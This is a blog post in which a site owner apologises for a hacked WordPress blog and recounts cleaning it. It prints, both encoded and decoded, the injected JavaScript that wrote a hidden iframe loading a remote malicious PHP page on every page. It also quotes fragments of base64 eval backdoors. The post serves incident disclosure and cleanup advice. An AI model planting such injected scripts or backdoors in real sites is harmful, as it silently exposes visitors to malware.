Spring Cleaning – Of Hacked Files

I do feel like I have to post an apology.  Even though I try my best to try to stay virus free, apparently some still slip through.  I recently decided I would upgrade the Wordpress version to a newer one, and ran into some difficulties/error messages and such.  Like the Wordpress Dashboard reloading or getting redirected to some url like: iss9w8s89xx.org or something.  I’m not sure how long ago the blog was compromised so my apologies to the visitors of the site.

After some searching I found the source, and cause of my problems.  Apparently it was caused by using CoreFTP, and saving the password in that program which some virus on my computer managed to get into.  Which then got access my Wordpress blog.

Especially noticeable was the code fragment which appeared on the bottom of every page:

script language=”javascript”>eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B”))</script>eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B”))</script

Which appeared at the bottom of every single page which after some searching around on the net converted into:

script language=”javascript”>eval(unescape(“document.write(‘<iframe src=”http://iss9w8s89xx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script>eval(unescape(“document.write(‘<iframe src=”http://iss9w8s89xx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script

I used a java unescape decoder to decode the script, if anyone was curious.

Oddly enough this code wasn’t in any of the files, but I later found out that many of the php files in my site had fragments of code like:

eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvY

or

Y29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1

etc

If anyone else runs into similar issues with their blogs go to:

http://www.google.com/support/forum/p/Webmasters/thread?tid=6f4cf473c414de1f&hl=en

For the solution on how to fix/clean your Wordpress blog of the hack/backdoor.

Some other useful links for me this time around was:

How to find a backdoor in a hacked WordPress

http://tools.tortoisesvn.net/grepWin – program I  used to strip the code from my pages.

Anyways hopefully I managed to clear out all of the nasty scripts from the site, but if anyone notices anything abnormal send a message through my contact form.

Some parts of the site, or links may have become broken due to cleaning/stripping the malicious code so I would appreciate it, if you do notice it, to bring it up to me.

Popularity: 1% [?]


    •